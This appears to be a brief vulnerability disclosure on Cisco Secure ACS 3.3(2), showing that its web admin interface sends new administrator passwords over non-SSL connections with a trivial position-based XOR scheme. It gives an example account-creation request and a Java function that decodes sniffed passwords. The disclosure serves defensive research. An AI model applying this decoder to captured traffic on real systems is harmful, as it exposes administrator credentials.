Cisco ACS Encoding research


Research Notes:
--------------
Product: Cisco Secure ACS Release 3.3(2) Build 2 
Company: Cisco
Website: www.cisco.com
Know's Company: Cisco recommend use SSL feature
Author: Francisco Amato

Cisco ACS Web-Administrator without SSL use a simple method of encription sensitive information (like passwords)
that it's send between client/server when a Administrator add New account.

If an attacker sniffer the traffic between client/server it is very simple to decrypt the information. 

Example:

It is the POST used to create a new administrator account:
http://acs-server.com:xxx/setup.exe?action=add_new_administrator&ACCOUNT_NAME_FIELD=pepe&PasswordEnc=1&ACCOUNT_PASSWORD=umvv&ConfirmEnc=1&ACCOUNT_CONFIRM=umvv

In ACCOUNT_CONFIRM and ACCOUNT_PASSWORD parameters is the "encryted" password.

Using the following Java function (Decrypt) we can decrypt/encrypt the password

   public String Decrypt(String s)
    { 
        StringBuffer stringbuffer = new StringBuffer();
        if(s != null)
        {
            byte abyte0[] = s.getBytes();
            for(byte byte0 = 0; byte0 < s.length(); byte0++)
                 stringbuffer.append((char)intXOR(abyte0[byte0], byte0));
        }
        return stringbuffer.toString();
    }

    private byte intXOR(byte byte0, byte byte1)
    {
     // byte0 = ascii dato
     // byte1 = ubication 
        byte byte2 = (byte)(((byte1 + 3) * 7) % 10);       
        byte byte3 = (byte)(byte0 ^ byte2);
        return byte3;
    }

Post a Comment
Thanks for your comment